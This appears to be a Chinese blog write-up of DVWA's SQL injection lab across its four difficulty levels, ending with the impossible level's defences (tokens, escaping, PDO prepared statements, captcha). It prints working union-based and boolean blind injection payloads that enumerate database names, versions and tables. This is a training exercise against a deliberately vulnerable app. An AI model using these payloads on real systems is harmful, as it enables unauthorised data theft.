dvwa7——SQL Injection

LOW:

f12打开hackbar

一:判断注入类型

输入id=1'报错

闭合单引号 ,页面恢复正常

所以为单引号字符型

二:开始攻击

1.判断列数

复制代码
?id=1' order by 2--+

到3的时候开始报错,所以一共两列

2.爆回显位置

复制代码
?id=-1' union select 2,3--+

3.爆数据库名和版本号

复制代码
?id=-1' union select database(),version()--+

4.爆表名

复制代码
?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5.爆库名

(1)guestbook

(2)users

6.爆guestbook的数据:

MEDIUM:

发现界面变成了这样:

随便提交一个,submit的时候用bp抓包

抓到这些,我们发现这一关的提交形式从get变成了post,格式以红框内为准

继续打开hackbar,发现单引号双引号括号无论闭合不闭合都报错,所以我们判断为数字型

复制代码
id=1 order by 3&Submit=Submit

到3的时候报错,所以一共两列

剩下的表单爆数据不再过多赘述

HIGH:

直接输入前边无正确回显,可以用盲注,参考这一章

复制代码
1' and 1=1#
1' and 1=2#

前者正常,后者无回显,所以是字符型注入,参考这一篇

sqli---labs第八关------布尔盲注_sqli-labs盲注脚本-CSDN博客

IMPOSSIBLE:

优化部分:

复制代码
checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php');

1.checktoken()

2.mysqli_real_escape_string()转义函数去除反斜杠

3.pdo预处理,参数化查询

4.limit 1限制返回结果

5.generateSessionToken()在文件末尾生成新token供下次使用

6.captcha验证(recaptcha_check_answer())(人机验证)

相关推荐
小志开发1 天前
SQL从入门到起飞:完整学习数据库与100+练习题
数据库·sql·学习·mysql·oracle·sqlserver·navcat
轩情吖1 天前
Qt常用控件之QLabel(一)
开发语言·数据库·c++·qt·小程序·qlabel·桌面开发
汽车仪器仪表相关领域1 天前
工业安全新利器:NHQT-4四合一检测线系统深度解析
网络·数据库·人工智能·安全·汽车·检测站·汽车检测
lypzcgf1 天前
Coze源码分析-资源库-创建数据库-后端源码-安全与错误处理
数据库·安全·go·coze·coze源码分析·ai应用平台·agent平台
望获linux1 天前
【实时Linux实战系列】实时安全 C++ 模式:无异常、预分配与自定义分配器
java·linux·服务器·开发语言·数据库·chrome·tomcat
安达天下1 天前
Al驱动下的智能网联汽车创新与应用专题培训
网络安全·功能安全·aspice·预期功能安全·安达天下
TDengine (老段)1 天前
TDengine 聚合函数 VAR_POP 用户手册
大数据·数据库·sql·物联网·时序数据库·tdengine·涛思数据
不剪发的Tony老师1 天前
SQLite Expert:一款功能强大的SQLite管理工具
数据库·sqlite
麦当_1 天前
Cloudflare Workers 环境下的数据库死锁问题及解决方案
javascript·数据库·后端
xhbh6661 天前
【硬核对比】Hive与MySQL全方位深度对比:从架构、SQL语法到应用场景,搞懂选型不踩坑
数据库·mysql·hive和mysql的区别